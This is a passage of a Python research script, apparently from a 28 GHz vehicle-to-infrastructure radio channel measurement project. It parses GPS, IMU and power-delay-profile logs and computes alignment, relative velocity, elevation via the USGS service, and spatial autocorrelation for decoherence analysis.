2\r\n\r\n if is_tx:\r\n pitch_calc *= (pitch_calc * -30.0 if pitch_calc < 0.0 else 30.0) / (pitch_calc * pitch_calc)\r\n else:\r\n pitch_calc *= (pitch_calc * -5.0 if pitch_calc < 0.0 else 5.0) / (pitch_calc * pitch_calc)\r\n\r\n return abs(yaw(m) - yaw_calc), abs(pitch(m) - pitch_calc)\r\n\r\n\r\n# Tx-Rx overall relative alignment accuracy (deg)\r\ndef tx_rx_alignment(tx: GPSEvent, rx: GPSEvent, m_tx: IMUTrace, m_rx: IMUTrace) -> float:\r\n m_tx_yaw_, m_tx_pitch_ = d_alignment(tx, rx, m_tx)\r\n m_rx_yaw_, m_rx_pitch_ = d_alignment(rx, tx, m_rx, False)\r\n return max(abs(180.0 - m_tx_yaw_ - m_rx_yaw_), abs(180.0 - m_tx_pitch_ - m_rx_pitch_))\r\n\r\n\r\n# Tx-Rx relative velocity (ms-1) [N&W hemispheres only]\r\n# TO-DO: Instead of using lat & long relative movements, use the Tx & Rx headings from the GPS logs.\r\ndef tx_rx_relative_velocity(tx: GPSEvent, rx_i: GPSEvent, rx_j: GPSEvent) -> float:\r\n rx_i_lat, rx_i_lon = latitude(rx_i), longitude(rx_i)\r\n rx_j_lat, rx_j_lon = latitude(rx_j), longitude(rx_j)\r\n rx_ds = distance.distance((rx_i_lat, rx_i_lon), (rx_j_lat, rx_j_lon)).m\r\n\r\n rx_i_dt = datetime.datetime.strptime(rx_i.timestamp, datetime_format)\r\n rx_j_dt = datetime.datetime.strptime(rx_j.timestamp, datetime_format)\r\n rx_dt = abs((rx_j_dt - rx_i_dt).seconds)\r\n\r\n if rx_dt == 0.0:\r\n return 0.0\r\n\r\n rx_v = rx_ds / rx_dt\r\n\r\n if tx_rx_distance_2d(tx, rx_i) > tx_rx_distance_2d(tx, rx_j):\r\n rx_v *= -1 # Multiply by -1 if the Rx is going towards the Tx...\r\n\r\n return rx_v\r\n\r\n\r\n# USGS EPQS: Tx/Rx elevation (m)\r\ndef elevation(y: GPSEvent) -> float:\r\n elev_url, elev_val = '', 0.0\r\n lat, lon, alt = latitude(y), longitude(y), altitude(y)\r\n base_epqs_url = ('https://epqs.nationalmap.gov/v1/json?'\r\n 'x={}&y={}&units=Meters&wkid=4326&includeDate=False')\r\n\r\n while True:\r\n try:\r\n elev_url = base_epqs_url.format(lon, lat)\r\n elev_val = abs(alt - float(requests.get(elev_url).json()['value']))\r\n except KeyError as ke:\r\n print('SPAVE-28G | Consolidated Processing II | KeyError caught while getting elevation data '\r\n 'from URL: {} | Retrying... | Traceback: {}'.format(elev_url, traceback.print_tb(ke.__traceback__)))\r\n continue # Retry querying the USGS EPQS URL for accurate elevation data...\r\n except JSONDecodeError as jde_:\r\n print('SPAVE-28G | Consolidated Processing II | JSONDecodeError caught while getting elevation data '\r\n 'from URL: {} | Retrying... | Traceback: {}'.format(elev_url, traceback.print_tb(jde_.__traceback__)))\r\n continue # Retry querying the USGS EPQS URL for accurate elevation data...\r\n except Exception as e_:\r\n print('SPAVE-28G | Consolidated Processing II | Exception caught while getting elevation data '\r\n 'from URL: {} | Retrying... 
| Traceback: {}'.format(elev_url, traceback.print_tb(e_.__traceback__)))\r\n continue # Retry querying the USGS EPQS URL for accurate elevation data...\r\n break\r\n\r\n return elev_val\r\n\r\n\r\n\"\"\"\r\n# Cartesian coordinates to Spherical coordinates (x, y, z) -> (r, phi, theta) radians\r\ndef cart2sph(x: float, y: float, z: float) -> Tuple:\r\n return np.sqrt((x ** 2) + (y ** 2) + (z ** 2)), np.arctan2(y, x), np.arctan2(z, np.sqrt((x ** 2) + (y ** 2)))\r\n\"\"\"\r\n\r\n\"\"\"\r\n# Spherical coordinates to Cartesian coordinates -> (r, phi, theta) radians -> (x, y, z)\r\ndef sph2cart(r: float, phi: float, theta: float) -> Tuple:\r\n return r * np.sin(theta) * np.cos(phi), r * np.sin(theta) * np.sin(phi), r * np.cos(theta)\r\n\"\"\"\r\n\r\n\r\n# Process the power-delay-profiles recorded at the receiver\r\ndef process_rx_samples(x: np.array) -> Tuple:\r\n fs, ne_th = sample_rate, ne_amp_threshold\r\n f_pass, f_stop, d_pass, d_stop = prefilter_config.values()\r\n t_win_mul, t_trunc_len, t_trunc_mul = time_windowing_config.values()\r\n\r\n # Frequency Manipulation: Pre-filtering via a Low Pass Filter (LPF)\r\n b = fir_d.fir_remez_lpf(fs=fs, f_pass=f_pass, f_stop=f_stop, d_pass=d_pass, d_stop=d_stop)\r\n samps = signal.lfilter(b=b, a=1, x=x, axis=0)\r\n\r\n # Temporal Manipulation I: Temporal truncation\r\n samps = samps[t_trunc_len:] if samps.shape[0] > (t_trunc_mul * t_trunc_len) else samps\r\n\r\n # Temporal Manipulation II: Time-windowing\r\n window_size, n_samples = int(fs * t_win_mul), samps.shape[0]\r\n samps = samps[int(0.5 * window_size):int(1.5 * window_size)] if n_samples > 2 * window_size else samps\r\n\r\n # Noise Elimination: The peak search method is 'TallEnoughAbs'\r\n ne_samps = np.squeeze(samps[np.array(np.where(np.abs(samps) > ne_th * np.max(np.abs(samps))), dtype=int)])\r\n\r\n return ne_samps.shape[0], ne_samps\r\n\r\n\r\n# Correlation peak in the processed rx_samples (linear)\r\ndef correlation_peak(x: np.array) -> float:\r\n return np.max(np.abs(x))\r\n\r\n\r\n\"\"\"\r\n# RMS delay spread computation (std | s)\r\n# See Visualizations-I: [https://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6691924]\r\ndef rms_delay_spread(mpcs: List[MPCParameters]) -> float:\r\n num1, num2, den = [], [], []\r\n\r\n for mpc in mpcs:\r\n tau, p_tau = mpc.delay, mpc.profile_point_power\r\n num1.append(np.square(tau) * p_tau)\r\n num2.append(tau * p_tau)\r\n den.append(p_tau)\r\n\r\n num1_sum, num2_sum, den_sum = np.sum(num1), np.sum(num2), np.sum(den)\r\n\r\n return np.sqrt((num1_sum / den_sum) - np.square(num2_sum / den_sum))\r\n\"\"\"\r\n\r\n\"\"\"\r\n# RMS AoA direction spread computation (std | no-units [normalized])\r\n# See Visualizations-II: [https://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=5956639]\r\ndef rms_aoa_direction_spread(mpcs: List[MPCParameters]) -> float:\r\n e_vecs, p_vec, mu_vec = [], [], []\r\n\r\n for _l_mpc in range(len(mpcs)):\r\n mpc = mpcs[_l_mpc]\r\n p = mpc.profile_point_power\r\n phi, theta = mpc.aoa_azimuth, mpc.aoa_elevation\r\n e_vecs.append(np.array([np.cos(phi) * np.sin(theta), np.sin(phi) * np.sin(theta), np.cos(theta)]))\r\n mu_vec.append(p * e_vecs[_l_mpc])\r\n p_vec.append(p)\r\n\r\n mu_omega = np.sum(mu_vec, axis=0)\r\n\r\n return np.sqrt(np.sum([np.square(np.linalg.norm(e_vecs[_l_mpc] -\r\n mu_omega)) * p_vec[_l_mpc] for _l_mpc in range(len(mpcs))]))\r\n\"\"\"\r\n\r\n\r\n# Spatial autocorrelation coefficient computation\r\n# See [https://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7996408]\r\n# Increasing Tx-Rx distance, Tx-Rx 
alignment accuracy, and Tx-Rx relative velocity | corr: prev | corr_: curr\r\ndef s_coeff(pdp: PDPSegment, pdp_: PDPSegment) -> float:\r\n n, n_ = pdp.num_samples, pdp_.num_samples\r\n samps, samps_ = pdp.processed_rx_samples, pdp_.processed_rx_samples\r\n\r\n s, s_ = np.abs(np.fft.fft(samps)) / n, np.abs(np.fft.fft(samps_)) / n_\r\n a, a_ = np.mean(s), np.mean(s_)\r\n ln = min(n, n_)\r\n\r\n s_mod, s_mod_ = (s - a)[:ln], (s_ - a_)[:ln]\r\n num = np.mean(s_mod * s_mod_)\r\n den = np.sqrt(np.mean(np.square(s_mod)) * np.mean(np.square(s_mod_)))\r\n\r\n return np.clip(num / den, -1.0, 1.0) if den != 0.0 else np.nan\r\n\r\n\r\n\"\"\"\r\n# Empirical Cumulative Distribution Function (variant-I)\r\ndef ecdf(x: np.array) -> Tuple:\r\n x_, cts = np.unique(x, return_counts=True)\r\n\r\n cum_sum = np.cumsum(cts)\r\n return x_, cum_sum / cum_sum[-1]\r\n\"\"\"\r\n\r\n\"\"\"\r\n# SAGE Algorithm: MPC parameters computation\r\n# See: [https://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=753729]\r\n# Also see: [https://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6901837]\r\ndef estimate_mpc_parameters(tx: GPSEvent, rx: GPSEvent, n: int, x: np.array) -> List:\r\n f_c, _f_c = tx_fc, rx_fc\r\n f_s, n_std = sample_rate, n_sigma\r\n v_0, l_, k_ = pn_v0, pn_l, pn_reps\r\n\r\n y_f = np.fft.fft(x) / n\r\n fs = np.argsort(np.fft.fftfreq(n, (1 / f_s)))\r\n n_f = (n_std * np.random.randn(fs.shape[0], )).view(np.csingle)\r\n\r\n # Previous parameter estimates ...$[i-1]$\r\n nus = np.zeros(shape=(max_mpcs,), dtype=np.float64)\r\n phis = np.zeros(shape=(max_mpcs,), dtype=np.float64)\r\n taus = np.zeros(shape=(max_mpcs,), dtype=np.float64)\r\n thetas = np.zeros(shape=(max_mpcs,), dtype=np.float64)\r\n alphas = np.zeros(shape=(max_mpcs,), dtype=np.csingle)\r\n\r\n '''\r\n TODO: Bring in an object-oriented programming methodology here wherein we have a configurable set of MPCParameters, \r\n possibly defined by enumerations, and each enum member has a class definition with its relevant routines such \r\n as convergence_check, getters/setters, L1/L2 norms, etc. 
This allows for easy encapsulation across the script.\r\n '''\r\n\r\n # Flip components in the rectangular chips of the PN-sequence $u(f)$\r\n def flip(a: int) -> int:\r\n assert a == 1 or a == -1\r\n return 1 if a == -1 else -1\r\n\r\n # Sinc function\r\n def sinc(z: float) -> float:\r\n return np.sin(pi * z) / (pi * z)\r\n\r\n # Baseband signal component post-convolution in the frequency domain $p(f; \\tau_{l}, \\nu_{l})$\r\n def signal_component(tau_l: float, nu_l: float) -> Tuple:\r\n f_shifts = []\r\n sig_sum = complex(0.0, 0.0)\r\n for k in range(k_):\r\n for _k in range(k_):\r\n f_shift = (((f_c * k) + (_f_c * _k)) / l_) + nu_l\r\n c_theta = -((2.0 * pi * f_c * (k / l_) * tau_l) + (pi * ((k + _k) / l_)))\r\n\r\n pn_sum = complex(0.0, 0.0)\r\n for i_l in range(l_):\r\n a_i = 1\r\n for _i_l in range(l_):\r\n _a_i = 1\r\n _c_theta = -(pi * (((k * i_l) + (_k * _i_l)) / l_))\r\n pn_sum += ((2 * a_i) - 1) * ((2 * _a_i) - 1) * complex(np.cos(_c_theta), np.sin(_c_theta))\r\n flip(_a_i)\r\n flip(a_i)\r\n\r\n f_shifts.append(f_shift)\r\n sig_sum += pn_sum * sinc(k / l_) * sinc(_k / l_) * complex(np.cos(c_theta), np.sin(c_theta))\r\n\r\n return f_shifts, np.square(v_0 / l_) * sig_sum\r\n\r\n # Complex gaussian noise component post-convolution in the frequency domain $n'(f)$\r\n def noise_component() -> Tuple:\r\n f_shifts = []\r\n n_sum = complex(0.0, 0.0)\r\n f_idxs = [_ for _ in range(fs.shape[0])]\r\n for k in range(k_):\r\n for _k in range(k_):\r\n f_shift = ((f_c * k) + (_f_c * _k)) / l_\r\n idx_f = min(f_idxs, key=lambda idx: abs(f_shift - fs[idx]))\r\n\r\n pn_sum = complex(0.0, 0.0)\r\n for i_l in range(l_):\r\n a_i = 1\r\n pn_sum += ((2 * a_i) - 1) * complex(np.cos(-pi * ((_k * i) / l_)), np.sin(-pi * ((_k * i) / l_)))\r\n flip(a_i)\r\n\r\n f_shifts.append(f_shift)\r\n n_sum += pn_sum * n_f[idx_f] * sinc(k / l_) * complex(np.cos(-pi * (_k / l_)), np.sin(-pi * (_k / l_)))\r\n\r\n return f_shifts, (v_0 / l_) * n_sum\r\n\r\n # See [https://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=753729]\r\n # Computing the steering vector [Angle-of-Arrival (AoA | azimuth & elevation)] at the Rx within SAGE\r\n def compute_steering(phi_l: float, theta_l: float) -> complex:\r\n az0, el0 = deg2rad(phi_l), deg2rad(theta_l)\r\n tx_lat, tx_lon, tx_alt = latitude(tx), longitude(tx), altitude(tx)\r\n rx_lat, rx_lon, rx_alt = latitude(rx), longitude(rx), altitude(rx)\r\n\r\n tx_e, tx_n = lla_utm_proj(tx_lon, tx_lat)\r\n rx_e, rx_n = lla_utm_proj(rx_lon, rx_lat)\r\n\r\n x0, y0, z0, x_, y_, z_ = rx_n, -rx_e, rx_alt, tx_n, -tx_e, tx_alt\r\n\r\n r1, az1, el1 = cart2sph(x_ - x0, y_ - y0, z_ - z0)\r\n\r\n r21, r22, r23 = 0.0, 1.0, 0.0\r\n r11, r12, r13 = sph2cart(0.0, 1.0, -el0)\r\n r31, r32, r33 = sph2cart(0.0, 1.0, -el0 + (pi / 2.0))\r\n\r\n x1, y1, z1 = sph2cart(r1, az1 - az0, el1)\r\n f_arr = np.matmul(np.array([x1, y1, z1]), np.array([[r11, r12, r13], [r21, r22, r23], [r31, r32, r33]]))\r\n\r\n az, el = rad2deg(f_arr[0]), rad2deg(f_arr[2])\r\n xs, ys, zs = sph2cart(1.0, deg2rad(az), deg2rad(el))\r\n az_amps_db, el_amps_db = decibel_1(az_amps), decibel_1(el_amps)\r\n azs0 = np.mod(rad2deg(np.arctan2(np.sign(ys) * np.sqrt(1 - np.square(xs)), xs)), 360.0)\r\n els0 = np.mod(rad2deg(np.arctan2(np.sign(zs) * np.sqrt(1 - np.square(xs)), xs)), 360.0)\r\n\r\n az_amps_norm_db = az_amps_db - max(az_amps_db) + max_ant_gain\r\n el_amps_norm_db = el_amps_db - max(el_amps_db) + max_ant_gain\r\n az_amps_norm = np.array([linear_1(db) for db in az_amps_norm_db])\r\n el_amps_norm = np.array([linear_1(db) for db in 
el_amps_norm_db])\r\n\r\n az_amps0 = interp1d(az_angles, az_amps_norm)(azs0)\r\n el_amps0 = interp1d(el_angles, el_amps_norm)(els0)\r\n\r\n ld, pos_vec = wlength, np.array([xs, ys, zs])\r\n f_aoa = ((az_amps0 * abs(ys)) + (el_amps0 * abs(zs))) / (abs(ys) + abs(zs))\r\n e_vec = np.array([np.cos(phi_l) * np.sin(theta_l), np.sin(phi_l) * np.sin(theta_l), np.cos(theta_l)])\r\n\r\n c_theta = 2.0 * pi * (1 / ld) * np.dot(e_vec, pos_vec)\r\n return f_aoa * complex(np.cos(c_theta), np.sin(c_theta))\r\n\r\n # Find the profile point power associated with the MPCParameters index (linear)\r\n def profile_point_power(l_idx: int) -> float:\r\n steering_l = compute_steering(phis_[l_idx], thetas_[l_idx])\r\n tau_l, nu_l, alpha_l = taus_[l_idx], nus_[l_idx], alphas_[l_idx]\r\n return np.square(np.abs(alpha_l * steering_l * signal_component(tau_l, nu_l)[1]))\r\n\r\n # Expectation of the log-likelihood component: Use $[i-1]$ estimates, i.e., phis, thetas, alphas, taus, nus\r\n def estep(l_idx: int, yf_s: np.array) -> np.array:\r\n return yf_s - np.sum(np.array([compute_steering(phis[_l_mpc], thetas[_l_mpc]) *\r\n alphas[_l_mpc] * signal_component(taus[_l_mpc], nus[_l_mpc])[1]\r\n for _l_mpc in range(max_mpcs) if _l_mpc != l_idx], dtype=np.csingle))\r\n\r\n # Maximization step for the MPC delay & Doppler shift $\\argmax_{\\tau,\\nu}\\{\\eta_(\\tau,\\nu)\\} (s, Hz)\r\n def tau_nu_mstep(l_idx: int) -> Tuple:\r\n tau_var, nu_var = cp.Variable(value=0.0), cp.Variable(value=0.0)\r\n\r\n estep_comps = estep(l_idx, y_f)\r\n sig_comp = signal_component(tau_var.value, nu_var.value)[1]\r\n sig_comps = np.array([sig_comp for _ in fs], dtype=np.csingle)\r\n\r\n numerator = cp.square(cp.abs(sig_comps.conj().T @ w_matrix @ estep_comps))\r\n denominator = cp.abs(sig_comps.conj().T @ w_matrix @ sig_comps)\r\n objective = numerator / denominator\r\n\r\n # noinspection PyTypeChecker\r\n problem = cp.Problem(objective=objective,\r\n constraints=[tau_min <= tau_var <= tau_max, nu_min <= nu_var <= nu_max])\r\n problem.solve(solver=solver, max_iters=max_iters, eps_abs=eps_abs, eps_rel=eps_rel, verbose=verbose)\r\n\r\n return tau_var.value, nu_var.value\r\n\r\n # Maximization step for the MPC complex attenuation (linear [complex])\r\n def alpha_mstep(l_idx: int, tau_l: float, nu_l: float, phi_l: float, theta_l: float) -> complex:\r\n estep_comps = estep(l_idx, y_f)\r\n sig_comp = signal_component(tau_l, nu_l)[1]\r\n steering_comp = compute_steering(phi_l, theta_l)\r\n sig_comps = steering_comp * np.array([sig_comp for _ in fs], dtype=np.csingle)\r\n\r\n numerator = functools.reduce(np.matmul, [sig_comps.conj().T, w_matrix, estep_comps])\r\n denominator = functools.reduce(np.matmul, [sig_comps.conj().T, w_matrix, sig_comps])\r\n\r\n return numerator / denominator\r\n\r\n # Maximization step for the MPC AoA azimuth and AoA elevation (rad, rad)\r\n def phi_theta_mstep(l_idx: int, tau_l: float, nu_l: float, alpha_l: complex) -> Tuple:\r\n phi_var, theta_var = cp.Variable(value=0.0), cp.Variable(value=0.0)\r\n\r\n estep_comps = estep(l_idx, y_f)\r\n sig_comp = signal_component(tau_l, nu_l)[1]\r\n steering_comp = compute_steering(phi_var.value, theta_var.value)\r\n\r\n sig_comps = steering_comp * alpha_l * np.array([sig_comp for _ in fs], dtype=np.csingle)\r\n numerator = cp.square(cp.abs(sig_comps.conj().T @ w_matrix @ estep_comps))\r\n denominator = cp.abs(sig_comps.conj().T @ w_matrix @ sig_comps)\r\n objective = numerator / denominator\r\n\r\n # noinspection PyTypeChecker\r\n problem = cp.Problem(objective=objective,\r\n 
constraints=[phi_min <= phi_var <= phi_max, the_min <= theta_var <= the_max])\r\n problem.solve(solver=solver, max_iters=max_iters, eps_abs=eps_abs, eps_rel=eps_rel, verbose=verbose)\r\n\r\n return phi_var.value, theta_var.value\r\n\r\n # Convergence check\r\n def is_converged(l_idx) -> bool:\r\n check = lambda param, param_, tol: np.abs(param - param_) > tol\r\n tau_tol, nu_tol, alpha_tol, phi_tol, theta_tol = delay_tol, doppler_tol, att_tol, aoa_az_tol, aoa_el_tol\r\n\r\n if first_iter or \\\r\n check(nus[l_idx], nus_[l_idx], nu_tol) or \\\r\n check(taus[l_idx], taus_[l_idx], tau_tol) or \\\r\n check(alphas[l_idx], alphas_[l_idx], alpha_tol) or \\\r\n check(phis[l_idx], phis_[l_idx], phi_tol) or check(thetas[l_idx], thetas_[l_idx], theta_tol):\r\n return False\r\n\r\n return True\r\n\r\n # Current parameter estimates ...$[i]$\r\n nus_ = np.zeros(shape=(max_mpcs,), dtype=np.float64)\r\n phis_ = np.zeros(shape=(max_mpcs,), dtype=np.float64)\r\n taus_ = np.zeros(shape=(max_mpcs,), dtype=np.float64)\r\n thetas_ = np.zeros(shape=(max_mpcs,), dtype=np.float64)\r\n alphas_ = np.zeros(shape=(max_mpcs,), dtype=np.csingle)\r\n nu_, tau_, phi_, theta_, alpha_ = nus_[0], taus_[0], phis_[0], thetas_[0], alphas_[0]\r\n w_matrix = np.linalg.inv(np.diag(np.full(fs.shape[0], np.mean(np.square(np.abs(noise_component()[1]))))))\r\n\r\n # SAGE wrapper\r\n for l_mpc in range(max_mpcs):\r\n first_iter = True\r\n\r\n while not is_converged(l_mpc):\r\n first_iter = False\r\n\r\n nus[l_mpc] = nu_\r\n taus[l_mpc] = tau_\r\n phis[l_mpc] = phi_\r\n thetas[l_mpc] = theta_\r\n alphas[l_mpc] = alpha_\r\n\r\n tau_, nu_ = tau_nu_mstep(l_mpc)\r\n taus_[l_mpc] = tau_\r\n nus_[l_mpc] = nu_\r\n\r\n phi_, theta_ = phi_theta_mstep(l_mpc, tau_, nu_, alphas[l_mpc])\r\n thetas_[l_mpc] = theta_\r\n phis_[l_mpc] = phi_\r\n\r\n alpha_ = alpha_mstep(l_mpc, tau_, nu_, phi_, theta_)\r\n alphas_[l_mpc] = alpha_\r\n\r\n return [MPCParameters(path_number=l_mpc, delay=taus_[l_mpc],\r\n doppler_shift=nus_[l_mpc], attenuation=alphas_[l_mpc],\r\n aoa_azimuth=phis_[l_mpc], aoa_elevation=thetas_[l_mpc],\r\n profile_point_power=profile_point_power(l_mpc)) for l_mpc in range(max_mpcs)]\r\n\"\"\"\r\n\r\n\"\"\"\r\nCORE OPERATIONS: Parsing the GPS, IMU, and PDP logs | SAGE estimation | Spatial consistency analyses\r\n\"\"\"\r\n\r\n# Antenna patterns\r\nlog = scipy.io.loadmat(ant_log_file)\r\naz_log, el_log = log['pat28GAzNorm'], log['pat28GElNorm']\r\naz_angles, az_amps = np.squeeze(az_log['azs'][0][0]), np.squeeze(az_log['amps'][0][0])\r\nel_angles, el_amps = np.squeeze(el_log['els'][0][0]), np.squeeze(el_log['amps'][0][0])\r\n\r\n# Extract Rx gps_events (Tx fixed on rooftop | V2I)\r\nwith ThreadPoolExecutor(max_workers=max_workers) as executor:\r\n for i in range(len(os.listdir(rx_gps_dir))):\r\n filename = 'gps_event_{}.json'.format(i + 1)\r\n\r\n # noinspection PyBroadException\r\n try:\r\n parse(rx_gps_events, GPSEvent, ''.join([rx_gps_dir, filename]))\r\n except JSONDecodeError as jde:\r\n print('SPAVE-28G | Consolidated Processing II | JSONDecodeError caught while parsing {}.'.format(filename))\r\n continue # Ignore the JSONDecodeError on this file | Move onto the next file...\r\n except Exception as e:\r\n print('SPAVE-28G | Consolidated Processing II | Exception caught while parsing {}.'.format(filename))\r\n continue # Ignore the Exception on this file | Move onto the next file...\r\n\r\n# Extract Tx imu_traces\r\nwith ThreadPoolExecutor(max_workers=max_workers) as executor:\r\n for i in range(0, len(os.listdir(tx_imu_dir)), 
tx_imu_skip_step):\r\n filename = 'imu_trace_{}.json'.format(i + 1)\r\n\r\n # noinspection PyBroadException\r\n try:\r\n parse(tx_imu_traces, IMUTrace, ''.join([tx_imu_dir, filename]))\r\n except JSONDecodeError as jde:\r\n print('SPAVE-28G | Consolidated Processing II | JSONDecodeError caught while parsing {}.'.format(filename))\r\n continue # Ignore the JSONDecodeError on this file | Move onto the next file...\r\n except Exception as e:\r\n print('SPAVE-28G | Consolidated Processing II | Exception caught while parsing {}.'.format(filename))\r\n continue # Ignore the Exception on this file | Move onto the next file...\r\n\r\n# Extract Rx imu_traces\r\nwith ThreadPoolExecutor(max_workers=max_workers) as executor:\r\n for i in range(len(os.listdir(rx_imu_dir))):\r\n filename = 'imu_trace_{}.json'.format(i + 1)\r\n\r\n # noinspection PyBroadException\r\n try:\r\n parse(rx_imu_traces, IMUTrace, ''.join([rx_imu_dir, filename]))\r\n except JSONDecodeError as jde:\r\n print('SPAVE-28G | Consolidated Processing II | JSONDecodeError caught while parsing {}.'.format(filename))\r\n continue # Ignore the JSONDecodeError on this file | Move onto the next file...\r\n except Exception as e:\r\n print('SPAVE-28G | Consolidated Processing II | Exception caught while parsing {}.'.format(filename))\r\n continue # Ignore the Exception on this file | Move onto the next file...\r\n\r\n# Extract timestamp_0 (start_timestamp)\r\nwith open(''.join([comm_dir, start_timestamp_file])) as file:\r\n elements = file.readline().split()\r\n timestamp_0 = datetime.datetime.strptime(''.join([elements[2], ' ', elements[3]]), datetime_format)\r\n\r\n''' Evaluate parsed_metadata | Extract power-delay profile samples '''\r\n\r\nsegment_done, pdp_samples_file = False, ''.join([comm_dir, pdp_samples_file])\r\ntimestamp_ref = datetime.datetime.strptime(rx_gps_events[0].timestamp, datetime_format)\r\n\r\nwith open(''.join([comm_dir, parsed_metadata_file])) as file:\r\n for line_num, line in enumerate(file):\r\n if line_num % 18 == 0:\r\n seq_number = int(re.search(r'\\d+', line)[0])\r\n elif (line_num - 3) % 18 == 0:\r\n # noinspection RegExpAnonymousGroup\r\n timestamp = timestamp_0 + datetime.timedelta(seconds=float(re.search(r'[+-]?\\d+(\\.\\d+)?', line)[0]))\r\n elif (line_num - 11) % 18 == 0 and timestamp >= timestamp_ref:\r\n num_samples = int(re.search(r'\\d+', line)[0])\r\n segment_done = True\r\n else:\r\n pass\r\n\r\n if segment_done:\r\n segment_done = False\r\n raw_rx_samples = np.fromfile(pdp_samples_file,\r\n offset=seq_number * num_samples, count=num_samples, dtype=np.csingle)\r\n\r\n if len(raw_rx_samples) == 0 or \\\r\n np.isnan(raw_rx_samples).any() or np.abs(np.min(raw_rx_samples)) > min_threshold:\r\n continue\r\n\r\n num_samples, processed_rx_samples = process_rx_samples(raw_rx_samples)\r\n\r\n pdp_segments.append(PDPSegment(num_samples=num_samples,\r\n seq_number=seq_number + 1, timestamp=str(timestamp),\r\n correlation_peak=correlation_peak(processed_rx_samples),\r\n raw_rx_samples=raw_rx_samples, processed_rx_samples=processed_rx_samples))\r\n\r\n''' Match gps_event, imu_trace, and pdp_segment timestamps across both the Tx and the Rx realms '''\r\n\r\nfor seqnum in range(1, len(rx_gps_events)):\r\n rx_gps_event = rx_gps_events[seqnum]\r\n seq_number, timestamp = rx_gps_event.seq_number, rx_gps_event.timestamp\r\n\r\n pdp_segment = min(pdp_segments, key=lambda x: abs(datetime.datetime.strptime(timestamp, datetime_format) -\r\n datetime.datetime.strptime(x.timestamp, datetime_format)))\r\n tx_imu_trace = 
min(tx_imu_traces, key=lambda x: abs(datetime.datetime.strptime(timestamp, datetime_format) -\r\n datetime.datetime.strptime(x.timestamp, datetime_format)))\r\n rx_imu_trace = min(rx_imu_traces, key=lambda x: abs(datetime.datetime.strptime(timestamp, datetime_format) -\r\n datetime.datetime.strptime(x.timestamp, datetime_format)))\r\n\r\n # mpc_parameters = estimate_mpc_parameters(tx_gps_event, rx_gps_event,\r\n # pdp_segment.num_samples, pdp_segment.processed_rx_samples)\r\n\r\n # pods.append(Pod(seq_number=seq_number, timestamp=timestamp,\r\n # tx_gps_event=tx_gps_event, tx_imu_trace=IMUTrace(),\r\n # rx_gps_event=rx_gps_event, rx_imu_trace=IMUTrace(),\r\n # rms_aoa_dir_spread=rms_aoa_direction_spread(mpc_parameters),\r\n # tx_rx_distance_2d=tx_rx_distance_2d(tx_gps_event, rx_gps_event),\r\n # tx_elevation=elevation(tx_gps_event), rx_elevation=elevation(rx_gps_event),\r\n # mpc_parameters=mpc_parameters, rms_delay_spread=rms_delay_spread(mpc_parameters),\r\n # tx_rx_alignment=tx_rx_alignment(tx_gps_event, rx_gps_event, IMUTrace(), IMUTrace()),\r\n # pdp_segment=pdp_segment, tx_rx_distance_3d=tx_rx_distance_3d(tx_gps_event, rx_gps_event)))\r\n\r\n pods.append(Pod(seq_number=seq_number, timestamp=timestamp,\r\n tx_gps_event=tx_gps_event, tx_imu_trace=IMUTrace(),\r\n rx_gps_event=rx_gps_event, rx_imu_trace=IMUTrace(),\r\n tx_rx_distance_2d=tx_rx_distance_2d(tx_gps_event, rx_gps_event),\r\n tx_elevation=elevation(tx_gps_event), rx_elevation=elevation(rx_gps_event),\r\n tx_rx_alignment=tx_rx_alignment(tx_gps_event, rx_gps_event, IMUTrace(), IMUTrace()),\r\n pdp_segment=pdp_segment, tx_rx_distance_3d=tx_rx_distance_3d(tx_gps_event, rx_gps_event)))\r\n\r\n\"\"\"\r\nCORE VISUALIZATIONS I: Spatial decoherence analyses\r\n\"\"\"\r\n\r\nidxs = [_i for _i in range(len(pods))]\r\npod = max(pods, key=lambda _pod: _pod.pdp_segment.correlation_peak)\r\n\r\nfor dn in np.arange(start=0.0, stop=d_max, step=d_step):\r\n '''\r\n # With Tx-Rx alignment more or less the same, compute s_coeff w.r.t \"pod\" for the pod with the dist closest to \"dn\"\r\n i_ = min(idxs, key=lambda idx: abs(pod.tx_rx_alignment - pods[idx].tx_rx_alignment) +\r\n abs(dn - distance_3d(pod.rx_gps_event, pods[idx].rx_gps_event)))\r\n '''\r\n i_ = min(idxs, key=lambda idx: abs(dn - distance_3d(pod.rx_gps_event, pods[idx].rx_gps_event)))\r\n distns.append((dn, s_coeff(pod.pdp_segment, pods[i_].pdp_segment)))\r\n\r\nfor an in np.arange(start=0.0, stop=a_max, step=a_step):\r\n '''\r\n # With Tx-Rx distance more or less the same, compute s_coeff w.r.t \"pod\" for the pod with alignment closest to \"an\"\r\n i_ = min(idxs, key=lambda idx: abs(distance_3d(pod.rx_gps_event, pods[idx].rx_gps_event)) +\r\n abs(an - abs(pod.tx_rx_alignment - pods[idx].tx_rx_alignment)))\r\n '''\r\n i_ = min(idxs, key=lambda idx: abs(an - abs(pod.tx_rx_alignment - pods[idx].tx_rx_alignment)))\r\n alignments.append((an, s_coeff(pod.pdp_segment, pods[i_].pdp_segment)))\r\n\r\nfor vn in np.arange(start=0.0, stop=v_max, step=v_step):\r\n '''\r\n # With Tx-Rx dist and align more or less the same, compute s_coeff w.r.t \"pod\" for the pod with vel closest to \"vn\"\r\n i_ = min(idxs, key=lambda idx: abs(pod.tx_rx_alignment - pods[idx].tx_rx_alignment) +\r\n abs(distance_3d(pod.rx_gps_event, pods[idx].rx_gps_event)) +\r\n abs(vn - tx_rx_relative_velocity(pod.tx_gps_event, pods[idx].tx_gps_event,\r\n pod.rx_gps_event, pods[idx].rx_gps_event)))\r\n '''\r\n i_ = min(idxs, key=lambda idx: abs(vn - tx_rx_relative_velocity(pod.tx_gps_event,\r\n pod.rx_gps_event, 
